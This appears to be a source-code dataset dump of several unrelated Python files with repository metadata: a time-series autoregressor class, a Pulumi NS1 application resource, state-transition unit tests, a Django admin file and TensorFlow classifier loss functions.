representing the order for each exogenous input,
i.e. :math:`[q_1, q_2, ..., q_m]` in equation
:eq:`direct`.
:param int pred_step: the prediction step :math:`k` in equation :eq:`gar`.
By default, it is set to 1.
:param list exog_delay: the delays of the exogenous inputs, a list of
integers representing the delay of each exogenous
input, i.e. :math:`[d_1, d_2, ..., d_m]` in
equation :eq:`direct`. By default, all the delays
are set to 0.
:param dict base_params: other keyword arguments for base_estimator.
"""
def __init__(self,
base_estimator,
auto_order,
exog_order,
pred_step,
exog_delay=None,
**base_params):
super(DirectAutoRegressor, self).__init__(
base_estimator,
auto_order,
exog_order,
exog_delay=exog_delay,
pred_step=pred_step,
**base_params)
def predict(self, X, y):
r"""
Produce multi-step prediction of y. The multi-step prediction is done
directly. No future X inputs are used in the prediction. The prediction
equation is as follows:
.. math::
\hat{y}(t + k) &=& f(y(t), ..., y(t - p + 1), \\
& & x_1(t - d_1), ..., x_1(t - d_1 - q_1 + 1) \\
& & ..., x_m(t - d_m), ..., x_m(t - d_m - q_m + 1))
:param array-like X: exogenous input time series, shape = (n_samples,
n_exog_inputs)
:param array-like y: target time series to predict, shape = (n_samples)
:param int step: prediction step.
:return: k-step prediction time series, shape = (n_samples). The
:math:`i` th value of the output is the k-step prediction of
the :math:`i` th value of the input ``y``. The first
``pred_step + max(auto_order - 1, max(exog_order +
exog_delay) - 1)`` values of the output is ``np.nan``.
"""
# TODO: this allows nan in X and y, but might need more error checking
X, y = np.array(X), np.array(y)
if len(self.exog_order) != X.shape[1]:
raise ValueError(
'The number of columns of X must be the same as the length of exog_order.'
)
p = self._get_lag_feature_processor(X, y)
features = p.generate_lag_features()
yhat = self._predictNA(features)
ypred = np.concatenate([np.empty(self.pred_step) * np.nan,
yhat])[0:len(y)]
return ypred
def score(self, X, y, method="r2", verbose=False):
"""
Produce multi-step prediction of y, and compute the metrics against y.
Nan is ignored when computing the metrics.
:param array-like X: exogenous input time series, shape = (n_samples,
n_exog_inputs)
:param array-like y: target time series to predict, shape = (n_samples)
:param string method: could be "r2" (R Square) or "mse" (Mean Square
Error).
:return: prediction metric. Nan is ignored when computing the metrics.
"""
ypred = self.predict(X, y)
mask = np.isnan(y) | np.isnan(ypred)
if verbose:
print('Evaluating {} score, {} of {} data points are evaluated.'.
format(method, np.sum(~mask), y.shape[0]))
if method == "r2":
return r2_score(y[~mask], ypred[~mask])
elif method == "mse":
return mean_squared_error(y[~mask], ypred[~mask])
| 44 | 90 | 0.527836 | 1,250 | 9,592 | 3.9176 | 0.1576 | 0.005309 | 0.026547 | 0.005718 | 0.814172 | 0.783541 | 0.769655 | 0.768021 | 0.754339 | 0.742495 | 0 | 0.011155 | 0.36447 | 9,592 | 217 | 91 | 44.202765 | 0.792159 | 0.60957 | 0 | 0.592593 | 0 | 0 | 0.069661 | 0 | 0 | 0 | 0 | 0.013825 | 0 | 1 | 0.074074 | false | 0 | 0.049383 | 0 | 0.222222 | 0.012346 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4d0511f6729a623f4f1781345f397bc7b3b397d9 | 17,944 | py | Python | sdk/python/pulumi_ns1/application.py | pulumi/pulumi-ns1 | 7200ab674c814fd18f8b59a90ee130574df4eafc | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_ns1/application.py | pulumi/pulumi-ns1 | 7200ab674c814fd18f8b59a90ee130574df4eafc | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2020-06-24T11:18:00.000Z | 2022-03-31T15:37:47.000Z | sdk/python/pulumi_ns1/application.py | pulumi/pulumi-ns1 | 7200ab674c814fd18f8b59a90ee130574df4eafc | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-01-12T23:15:35.000Z | 2021-01-12T23:15:35.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ApplicationArgs', 'Application']
@pulumi.input_type
class ApplicationArgs:
def __init__(__self__, *,
active: Optional[pulumi.Input[bool]] = None,
browser_wait_millis: Optional[pulumi.Input[int]] = None,
default_config: Optional[pulumi.Input['ApplicationDefaultConfigArgs']] = None,
jobs_per_transaction: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Application resource.
:param pulumi.Input[bool] active: Indicates whether or not this application is currently active and usable for traffic
steering.
:param pulumi.Input[int] browser_wait_millis: The amount of time (in milliseconds) the browser should wait before running
measurements.
:param pulumi.Input['ApplicationDefaultConfigArgs'] default_config: -(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used..
:param pulumi.Input[int] jobs_per_transaction: -(Optional) Number of jobs to measure per user impression.
:param pulumi.Input[str] name: Descriptive name for this Pulsar app.
"""
if active is not None:
pulumi.set(__self__, "active", active)
if browser_wait_millis is not None:
pulumi.set(__self__, "browser_wait_millis", browser_wait_millis)
if default_config is not None:
pulumi.set(__self__, "default_config", default_config)
if jobs_per_transaction is not None:
pulumi.set(__self__, "jobs_per_transaction", jobs_per_transaction)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def active(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not this application is currently active and usable for traffic
steering.
"""
return pulumi.get(self, "active")
@active.setter
def active(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "active", value)
@property
@pulumi.getter(name="browserWaitMillis")
def browser_wait_millis(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time (in milliseconds) the browser should wait before running
measurements.
"""
return pulumi.get(self, "browser_wait_millis")
@browser_wait_millis.setter
def browser_wait_millis(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "browser_wait_millis", value)
@property
@pulumi.getter(name="defaultConfig")
def default_config(self) -> Optional[pulumi.Input['ApplicationDefaultConfigArgs']]:
"""
-(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used..
"""
return pulumi.get(self, "default_config")
@default_config.setter
def default_config(self, value: Optional[pulumi.Input['ApplicationDefaultConfigArgs']]):
pulumi.set(self, "default_config", value)
@property
@pulumi.getter(name="jobsPerTransaction")
def jobs_per_transaction(self) -> Optional[pulumi.Input[int]]:
"""
-(Optional) Number of jobs to measure per user impression.
"""
return pulumi.get(self, "jobs_per_transaction")
@jobs_per_transaction.setter
def jobs_per_transaction(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "jobs_per_transaction", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Descriptive name for this Pulsar app.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _ApplicationState:
def __init__(__self__, *,
active: Optional[pulumi.Input[bool]] = None,
browser_wait_millis: Optional[pulumi.Input[int]] = None,
default_config: Optional[pulumi.Input['ApplicationDefaultConfigArgs']] = None,
jobs_per_transaction: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Application resources.
:param pulumi.Input[bool] active: Indicates whether or not this application is currently active and usable for traffic
steering.
:param pulumi.Input[int] browser_wait_millis: The amount of time (in milliseconds) the browser should wait before running
measurements.
:param pulumi.Input['ApplicationDefaultConfigArgs'] default_config: -(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used..
:param pulumi.Input[int] jobs_per_transaction: -(Optional) Number of jobs to measure per user impression.
:param pulumi.Input[str] name: Descriptive name for this Pulsar app.
"""
if active is not None:
pulumi.set(__self__, "active", active)
if browser_wait_millis is not None:
pulumi.set(__self__, "browser_wait_millis", browser_wait_millis)
if default_config is not None:
pulumi.set(__self__, "default_config", default_config)
if jobs_per_transaction is not None:
pulumi.set(__self__, "jobs_per_transaction", jobs_per_transaction)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def active(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not this application is currently active and usable for traffic
steering.
"""
return pulumi.get(self, "active")
@active.setter
def active(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "active", value)
@property
@pulumi.getter(name="browserWaitMillis")
def browser_wait_millis(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time (in milliseconds) the browser should wait before running
measurements.
"""
return pulumi.get(self, "browser_wait_millis")
@browser_wait_millis.setter
def browser_wait_millis(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "browser_wait_millis", value)
@property
@pulumi.getter(name="defaultConfig")
def default_config(self) -> Optional[pulumi.Input['ApplicationDefaultConfigArgs']]:
"""
-(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used..
"""
return pulumi.get(self, "default_config")
@default_config.setter
def default_config(self, value: Optional[pulumi.Input['ApplicationDefaultConfigArgs']]):
pulumi.set(self, "default_config", value)
@property
@pulumi.getter(name="jobsPerTransaction")
def jobs_per_transaction(self) -> Optional[pulumi.Input[int]]:
"""
-(Optional) Number of jobs to measure per user impression.
"""
return pulumi.get(self, "jobs_per_transaction")
@jobs_per_transaction.setter
def jobs_per_transaction(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "jobs_per_transaction", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Descriptive name for this Pulsar app.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
class Application(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
browser_wait_millis: Optional[pulumi.Input[int]] = None,
default_config: Optional[pulumi.Input[pulumi.InputType['ApplicationDefaultConfigArgs']]] = None,
jobs_per_transaction: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a NS1 Pulsar application resource. This can be used to create, modify, and delete applications.
## Example Usage
```python
import pulumi
import pulumi_ns1 as ns1
# Create a new pulsar application with default config
ns1_app = ns1.Application("ns1App", default_config=ns1.ApplicationDefaultConfigArgs(
http=True,
https=False,
job_timeout_millis=100,
request_timeout_millis=100,
static_values=True,
))
```
## NS1 Documentation
[Application Api Docs](https://ns1.com/api#get-list-pulsar-applications)
## Import
```sh
$ pulumi import ns1:index/application:Application `ns1_application`
```
So for the example above
```sh
$ pulumi import ns1:index/application:Application example terraform.example.io`
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] active: Indicates whether or not this application is currently active and usable for traffic
steering.
:param pulumi.Input[int] browser_wait_millis: The amount of time (in milliseconds) the browser should wait before running
measurements.
:param pulumi.Input[pulumi.InputType['ApplicationDefaultConfigArgs']] default_config: -(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used..
:param pulumi.Input[int] jobs_per_transaction: -(Optional) Number of jobs to measure per user impression.
:param pulumi.Input[str] name: Descriptive name for this Pulsar app.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[ApplicationArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a NS1 Pulsar application resource. This can be used to create, modify, and delete applications.
## Example Usage
```python
import pulumi
import pulumi_ns1 as ns1
# Create a new pulsar application with default config
ns1_app = ns1.Application("ns1App", default_config=ns1.ApplicationDefaultConfigArgs(
http=True,
https=False,
job_timeout_millis=100,
request_timeout_millis=100,
static_values=True,
))
```
## NS1 Documentation
[Application Api Docs](https://ns1.com/api#get-list-pulsar-applications)
## Import
```sh
$ pulumi import ns1:index/application:Application `ns1_application`
```
So for the example above
```sh
$ pulumi import ns1:index/application:Application example terraform.example.io`
```
:param str resource_name: The name of the resource.
:param ApplicationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApplicationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
browser_wait_millis: Optional[pulumi.Input[int]] = None,
default_config: Optional[pulumi.Input[pulumi.InputType['ApplicationDefaultConfigArgs']]] = None,
jobs_per_transaction: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApplicationArgs.__new__(ApplicationArgs)
__props__.__dict__["active"] = active
__props__.__dict__["browser_wait_millis"] = browser_wait_millis
__props__.__dict__["default_config"] = default_config
__props__.__dict__["jobs_per_transaction"] = jobs_per_transaction
__props__.__dict__["name"] = name
super(Application, __self__).__init__(
'ns1:index/application:Application',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
browser_wait_millis: Optional[pulumi.Input[int]] = None,
default_config: Optional[pulumi.Input[pulumi.InputType['ApplicationDefaultConfigArgs']]] = None,
jobs_per_transaction: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None) -> 'Application':
"""
Get an existing Application resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] active: Indicates whether or not this application is currently active and usable for traffic
steering.
:param pulumi.Input[int] browser_wait_millis: The amount of time (in milliseconds) the browser should wait before running
measurements.
:param pulumi.Input[pulumi.InputType['ApplicationDefaultConfigArgs']] default_config: -(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used..
:param pulumi.Input[int] jobs_per_transaction: -(Optional) Number of jobs to measure per user impression.
:param pulumi.Input[str] name: Descriptive name for this Pulsar app.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApplicationState.__new__(_ApplicationState)
__props__.__dict__["active"] = active
__props__.__dict__["browser_wait_millis"] = browser_wait_millis
__props__.__dict__["default_config"] = default_config
__props__.__dict__["jobs_per_transaction"] = jobs_per_transaction
__props__.__dict__["name"] = name
return Application(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def active(self) -> pulumi.Output[Optional[bool]]:
"""
Indicates whether or not this application is currently active and usable for traffic
steering.
"""
return pulumi.get(self, "active")
@property
@pulumi.getter(name="browserWaitMillis")
def browser_wait_millis(self) -> pulumi.Output[Optional[int]]:
"""
The amount of time (in milliseconds) the browser should wait before running
measurements.
"""
return pulumi.get(self, "browser_wait_millis")
@property
@pulumi.getter(name="defaultConfig")
def default_config(self) -> pulumi.Output[Optional['outputs.ApplicationDefaultConfig']]:
"""
-(Optional) Default job configuration. If a field is present here and not on a specific job
associated with this application, the default value specified here is used..
"""
return pulumi.get(self, "default_config")
@property
@pulumi.getter(name="jobsPerTransaction")
def jobs_per_transaction(self) -> pulumi.Output[Optional[int]]:
"""
-(Optional) Number of jobs to measure per user impression.
"""
return pulumi.get(self, "jobs_per_transaction")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Descriptive name for this Pulsar app.
"""
return pulumi.get(self, "name")
| 42.622328 | 185 | 0.653645 | 2,027 | 17,944 | 5.569808 | 0.098175 | 0.067228 | 0.075731 | 0.035075 | 0.850221 | 0.836758 | 0.831089 | 0.824092 | 0.819575 | 0.814526 | 0 | 0.002838 | 0.25379 | 17,944 | 420 | 186 | 42.72381 | 0.840329 | 0.369817 | 0 | 0.769608 | 1 | 0 | 0.121278 | 0.031461 | 0 | 0 | 0 | 0 | 0 | 1 | 0.156863 | false | 0.004902 | 0.034314 | 0 | 0.284314 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4d0ff943cd322f34a634a297edae3c7c06f5d4b5 | 5,192 | py | Python | tests/unit/master/core/execution/test_execution_state.py | yassineazzouz/kraken | 30d536eae2583e6fff51becbff836301058b8e69 | [
"MIT"
] | 1 | 2020-09-01T15:16:11.000Z | 2020-09-01T15:16:11.000Z | tests/unit/master/core/execution/test_execution_state.py | yassineazzouz/kraken | 30d536eae2583e6fff51becbff836301058b8e69 | [
"MIT"
] | null | null | null | tests/unit/master/core/execution/test_execution_state.py | yassineazzouz/kraken | 30d536eae2583e6fff51becbff836301058b8e69 | [
"MIT"
] | null | null | null | import pytest
from tanit.common.model.execution_type import ExecutionType
from tanit.common.model.job import Job
from tanit.master.core.execution.execution_job import (
IllegalStateTransitionException, # NOQA
)
from tanit.master.core.execution.execution_state import ExecutionState # NOQA
from tanit.master.core.execution.job_factory import JobFactory # NOQA
job_factory = JobFactory()
def mock_job_exec(num_tasks):
job = job_factory.create_job(Job(ExecutionType.MOCK, {"num_tasks": str(num_tasks)}))
job.setup()
return job
class TestExecutionState:
def test_initial_state(self):
job = mock_job_exec(2)
assert job.state == ExecutionState.SUBMITTED
for task in job.get_tasks():
assert task.state == ExecutionState.SUBMITTED
def test_schedule_state_transition(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
assert job.state == ExecutionState.SCHEDULED
for task in job.get_tasks()[1:]:
task.on_schedule()
assert job.state == ExecutionState.SCHEDULED
def test_dispatch_state(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
assert job.state == ExecutionState.DISPATCHED
for task in job.get_tasks()[1:]:
task.on_schedule()
assert job.state == ExecutionState.DISPATCHED
for task in job.get_tasks()[1:]:
task.on_dispatch()
assert job.state == ExecutionState.DISPATCHED
def test_running_state(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_schedule()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_dispatch()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_start()
assert job.state == ExecutionState.RUNNING
def test_running_state_2(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
with pytest.raises(IllegalStateTransitionException):
job.get_tasks()[0].on_start()
def test_finish_state(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
job.get_tasks()[0].on_finish()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_schedule()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_dispatch()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_start()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_finish()
assert job.state == ExecutionState.FINISHED
def test_finish_state_2(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
with pytest.raises(IllegalStateTransitionException):
job.get_tasks()[0].on_finish()
def test_fail_state_1(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
job.get_tasks()[0].on_fail()
assert job.state == ExecutionState.FAILED
for task in job.get_tasks()[1:]:
task.on_schedule()
task.on_dispatch()
task.on_start()
task.on_finish()
assert job.state == ExecutionState.FAILED
def test_fail_state_2(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
job.get_tasks()[0].on_finish()
assert job.state == ExecutionState.RUNNING
for task in job.get_tasks()[1:]:
task.on_schedule()
task.on_dispatch()
task.on_start()
task.on_fail()
assert job.state == ExecutionState.FAILED
def test_state_reset(self):
job = mock_job_exec(2)
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
job.get_tasks()[0].on_fail()
assert job.state == ExecutionState.FAILED
for task in job.get_tasks()[1:]:
task.on_schedule()
task.on_dispatch()
task.on_start()
task.on_finish()
assert job.state == ExecutionState.FAILED
job.get_tasks()[0].on_reset()
assert job.state == ExecutionState.RUNNING
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
assert job.state == ExecutionState.RUNNING
job.get_tasks()[0].on_finish()
assert job.state == ExecutionState.FINISHED
| 30.721893 | 88 | 0.618451 | 668 | 5,192 | 4.571856 | 0.083832 | 0.090373 | 0.165684 | 0.125737 | 0.817289 | 0.812705 | 0.766536 | 0.706942 | 0.706942 | 0.666994 | 0 | 0.015345 | 0.259438 | 5,192 | 168 | 89 | 30.904762 | 0.778934 | 0.002696 | 0 | 0.775194 | 0 | 0 | 0.001739 | 0 | 0 | 0 | 0 | 0 | 0.193798 | 1 | 0.085271 | false | 0 | 0.046512 | 0 | 0.147287 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4d8ce289e7edc738d4e2230ed71742e4e7585cc7 | 166 | py | Python | app/admin.py | jezzlucena/django-opp-trans | 05e8b2b91a6c46cd800837ae2b683ec043243742 | [
"MIT"
] | 1 | 2021-03-03T02:22:11.000Z | 2021-03-03T02:22:11.000Z | app/admin.py | jezzlucena/django-opp-trans | 05e8b2b91a6c46cd800837ae2b683ec043243742 | [
"MIT"
] | null | null | null | app/admin.py | jezzlucena/django-opp-trans | 05e8b2b91a6c46cd800837ae2b683ec043243742 | [
"MIT"
] | null | null | null | from django.contrib import admin
from app.models import Conversation
from app.models import Mutation
admin.site.register(Conversation)
admin.site.register(Mutation) | 23.714286 | 35 | 0.843373 | 23 | 166 | 6.086957 | 0.478261 | 0.1 | 0.185714 | 0.271429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090361 | 166 | 7 | 36 | 23.714286 | 0.927152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4d9b969d5a036397b77727088cacfd9949d86e1e | 7,151 | py | Python | classifier/loss.py | Florian-Barthel/stylegan2 | 4ef87038bf9370596cf2b729e1d1a1bc3ebcddd8 | [
"BSD-Source-Code"
] | null | null | null | classifier/loss.py | Florian-Barthel/stylegan2 | 4ef87038bf9370596cf2b729e1d1a1bc3ebcddd8 | [
"BSD-Source-Code"
] | null | null | null | classifier/loss.py | Florian-Barthel/stylegan2 | 4ef87038bf9370596cf2b729e1d1a1bc3ebcddd8 | [
"BSD-Source-Code"
] | null | null | null | import tensorflow as tf
from dnnlib.tflib.autosummary import autosummary
def cross_entropy(classifier, images, labels):
prediction = classifier.get_output_for(images, is_training=True)
loss = labels * -tf.log(prediction)
loss = autosummary('Classifier/loss', loss)
return loss, labels, prediction
def cross_entropy_focal(classifier, images, labels):
prediction = classifier.get_output_for(images, is_training=True)
loss = labels * -tf.log(prediction) * (1 - prediction) * (1 - prediction)
loss = autosummary('Classifier/loss', loss)
return loss, labels, prediction
def cross_entropy_multiple(classifier, images, labels):
model_pred, color_pred, manufacturer_pred, body_pred, rotation_pred, ratio_pred, background_pred = classifier.get_output_for(images, is_training=True)
offsets = [1, 67, 12, 18, 10, 8, 5, 6]
current_offset = offsets[0]
next_offset = current_offset + offsets[1]
model_label = labels[:, current_offset:next_offset]
model_loss = model_label * -tf.log(model_pred)
model_loss = autosummary('Classifier_multiple/model_loss', model_loss)
loss = tf.reduce_sum(model_loss)
current_offset = next_offset
next_offset = current_offset + offsets[2]
color_label = labels[:, current_offset:next_offset]
color_loss = color_label * -tf.log(color_pred)
color_loss = autosummary('Classifier_multiple/model_loss', color_loss)
loss += tf.reduce_sum(color_loss)
current_offset = next_offset
next_offset = current_offset + offsets[3]
manufacturer_label = labels[:, current_offset:next_offset]
manufacturer_loss = manufacturer_label * -tf.log(manufacturer_pred)
manufacturer_loss = autosummary('Classifier_multiple/manufacturer_loss', manufacturer_loss)
loss += tf.reduce_sum(manufacturer_loss)
current_offset = next_offset
next_offset = current_offset + offsets[4]
body_label = labels[:, current_offset:next_offset]
body_loss = body_label * -tf.log(body_pred)
body_loss = autosummary('Classifier_multiple/body_loss', body_loss)
loss += tf.reduce_sum(body_loss)
current_offset = next_offset
next_offset = current_offset + offsets[5]
rotation_label = labels[:, current_offset:next_offset]
rotation_loss = rotation_label * -tf.log(rotation_pred)
rotation_loss = autosummary('Classifier_multiple/rotation_loss', rotation_loss)
loss += tf.reduce_sum(rotation_loss)
current_offset = next_offset
next_offset = current_offset + offsets[6]
ratio_label = labels[:, current_offset:next_offset]
ratio_loss = ratio_label * -tf.log(ratio_pred)
ratio_loss = autosummary('Classifier_multiple/model_loss', ratio_loss)
loss += tf.reduce_sum(ratio_loss)
current_offset = next_offset
next_offset = current_offset + offsets[7]
background_label = labels[:, current_offset:next_offset]
background_loss = background_label * -tf.log(background_pred)
background_loss = autosummary('Classifier_multiple/background_loss', background_loss)
loss += tf.reduce_sum(background_loss)
loss = autosummary('Classifier/loss', loss)
return loss, labels
def cross_entropy_multiple_focal(classifier, images, labels):
model_pred, color_pred, manufacturer_pred, body_pred, rotation_pred, ratio_pred, background_pred = classifier.get_output_for(images, is_training=True)
offsets = [1, 67, 12, 18, 10, 8, 5, 6]
current_offset = offsets[0]
next_offset = current_offset + offsets[1]
model_label = labels[:, current_offset:next_offset]
model_loss = model_label * -tf.log(model_pred) * (1 - model_pred) * (1 - model_pred)
model_loss = autosummary('Classifier_multiple/model_loss', model_loss)
loss = tf.reduce_sum(model_loss)
current_offset = next_offset
next_offset = current_offset + offsets[2]
color_label = labels[:, current_offset:next_offset]
color_loss = color_label * -tf.log(color_pred) * (1 - color_pred) * (1 - color_pred)
color_loss = autosummary('Classifier_multiple/model_loss', color_loss)
loss += tf.reduce_sum(color_loss)
current_offset = next_offset
next_offset = current_offset + offsets[3]
manufacturer_label = labels[:, current_offset:next_offset]
manufacturer_loss = manufacturer_label * -tf.log(manufacturer_pred) * (1 - manufacturer_pred) * (1 - manufacturer_pred)
manufacturer_loss = autosummary('Classifier_multiple/manufacturer_loss', manufacturer_loss)
loss += tf.reduce_sum(manufacturer_loss)
current_offset = next_offset
next_offset = current_offset + offsets[4]
body_label = labels[:, current_offset:next_offset]
body_loss = body_label * -tf.log(body_pred) * (1 - body_pred) * (1 - body_pred)
body_loss = autosummary('Classifier_multiple/body_loss', body_loss)
loss += tf.reduce_sum(body_loss)
current_offset = next_offset
next_offset = current_offset + offsets[5]
rotation_label = labels[:, current_offset:next_offset]
rotation_loss = rotation_label * -tf.log(rotation_pred) * (1 - rotation_pred) * (1 - rotation_pred)
rotation_loss = autosummary('Classifier_multiple/rotation_loss', rotation_loss)
loss += tf.reduce_sum(rotation_loss)
current_offset = next_offset
next_offset = current_offset + offsets[6]
ratio_label = labels[:, current_offset:next_offset]
ratio_loss = ratio_label * -tf.log(ratio_pred) * (1 - ratio_pred) * (1 - ratio_pred)
ratio_loss = autosummary('Classifier_multiple/model_loss', ratio_loss)
loss += tf.reduce_sum(ratio_loss)
current_offset = next_offset
next_offset = current_offset + offsets[7]
background_label = labels[:, current_offset:next_offset]
background_loss = background_label * -tf.log(background_pred) * (1 - background_pred) * (1 - background_pred)
background_loss = autosummary('Classifier_multiple/background_loss', background_loss)
loss += tf.reduce_sum(background_loss)
loss = autosummary('Classifier/loss', loss)
return loss, labels
def euclidean(classifier, images, labels, reg_factor=0.0):
prediction = classifier.get_output_for(images, is_training=True)
prediction = prediction[:, 0:2]
distance_real_rotations = tf.norm(labels - prediction, axis=-1)
distance_real_rotations = distance_real_rotations * tf.reduce_max(tf.ceil(tf.abs(labels)), axis=-1)
distance_real_rotations = autosummary('Loss/rotation_distance/real', distance_real_rotations)
regularization = tf.reduce_sum(tf.square(prediction), axis=-1) - tf.ones(4)
loss = distance_real_rotations
loss += regularization * reg_factor
return loss, labels, prediction
def squared_euclidean(classifier, images, labels, reg_factor=0.0):
